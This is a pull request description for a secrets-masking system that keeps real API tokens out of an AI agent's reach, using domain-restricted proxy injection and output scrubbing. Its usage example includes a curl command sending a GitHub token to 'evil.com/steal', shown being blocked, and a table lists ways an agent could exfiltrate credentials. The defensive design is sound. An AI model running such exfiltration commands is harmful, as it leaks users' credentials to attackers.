 
 describe('isAllowedDomain()', () => {


### PR DESCRIPTION
## Summary

Adds a secrets infrastructure that makes API keys, tokens, and credentials available to the SLICC agent while **preventing the agent from ever seeing or exfiltrating the real values**.

### How it works

1. **User stores secrets** with domain restrictions (e.g. `GITHUB_TOKEN` → `api.github.com,*.github.com`)
2. **Agent sees only masked values** — deterministic HMAC-SHA256 hashes formatted to look like real tokens
3. **Fetch proxy enforces domains** — server-side proxy replaces masked→real only if target domain is authorized. Unauthorized → 403.
4. **Response scrubbing** — upstream API responses that echo real secrets are scrubbed before reaching the agent
5. **Shell env populated** with masked values — `$GITHUB_TOKEN` expands to a mask, never the real value

### Storage backends
- **swift-server**: macOS Keychain (Security framework)
- **node-server**: `.env` file at `~/.slicc/secrets.env` with `<NAME>_DOMAINS` convention

### Secret model

Three fields: **name**, **value**, **domains**. No overengineering.

```env
GITHUB_TOKEN=ghp_abc123...
GITHUB_TOKEN_DOMAINS=api.github.com,*.github.com
```

### Extraction vectors addressed

| Vector | Mitigation |
|--------|-----------|
| HTTP requests (curl/fetch) | Fetch proxy validates domain before replacing mask→real |
| Shell env (`echo $SECRET`) | Env contains only masked values |
| File reads | Output scrubbing replaces real values |
| CDP / browser automation | Agent only has masked values, cannot construct real ones |
| Response echo-back | Proxy scrubs response bodies/headers for real values |
| Shell output (stdout/stderr) | All tool output scrubbed at boundary |
| Git operations | Goes through bash, scrubbed at output boundary |
| Redirect URLs | Proxy follows redirects server-side |

### New files

**Swift (packages/swift-server/)**
- `Sources/Keychain/SecretStore.swift` — Keychain CRUD
- `Sources/Keychain/SecretMasking.swift` — HMAC masking engine
- `Sources/Keychain/SecretInjector.swift` — fetch proxy secret injection + response scrubbing
- Tests: `KeychainSecretStoreTests`, `SecretMaskingTests`, `SecretInjectorTests`, `SecretAPIRoutesTests`

**Node (packages/node-server/)**
- `src/secrets/env-secret-store.ts` — `.env` file CRUD
- `src/secrets/env-file.ts` — `.env` parser/writer
- `src/secrets/domain-match.ts` — glob domain matching
- `src/secrets/proxy-manager.ts` — fetch proxy secret injection + response scrubbing
- `src/secrets/masking.ts` — masking wrapper
- Tests: `proxy-manager.test.ts`

**Webapp (packages/webapp/)**
- `src/core/secret-masking.ts` — HMAC masking, format-preserving prefixes, scrubber builder
- `src/core/secret-env.ts` — fetch masked env from server
- `src/shell/supplemental-commands/secret-command.ts` — `secret set/list/delete/test`
- Tests: `secret-masking.test.ts`

### Modified files
- `packages/swift-server/Sources/Server/APIRoutes.swift` — secret API routes + proxy injection
- `packages/swift-server/Sources/CLI/ServerCommand.swift` — SecretInjector init
- `packages/node-server/src/index.ts` — secret API routes + proxy injection
- `packages/webapp/src/shell/supplemental-commands.ts` — register secret command
- `packages/webapp/src/scoops/scoop-context.ts` — shell env population
- `packages/webapp/src/ui/main.ts` — shell env population

### Usage

```bash
# Store a secret with domain restriction
secret set GITHUB_TOKEN --domain "api.github.com,*.github.com"
> Enter value: ****

# List configured secrets
secret list
# GITHUB_TOKEN  api.github.com, *.github.com

# Agent uses it naturally — only sees masked value
echo $GITHUB_TOKEN
# ghp_a1b2c3d4e5f6... (masked, not real)

# Fetch proxy swaps mask→real for authorized domains
curl -H "Authorization: Bearer $GITHUB_TOKEN" https://api.github.com/user
# ✅ Works — domain matches

curl -H "Authorization: Bearer $GITHUB_TOKEN" https://evil.com/steal
# ❌ 403 — domain not authorized
```

### Follow-up issues
- #313 — as-a-bot integration for GitHub token acquisition via device flow
- #314 — MCPecrets integration as cloud-synced secret backend
- #315 — Sliccstart UI for Keychain secret management + permission dialogs
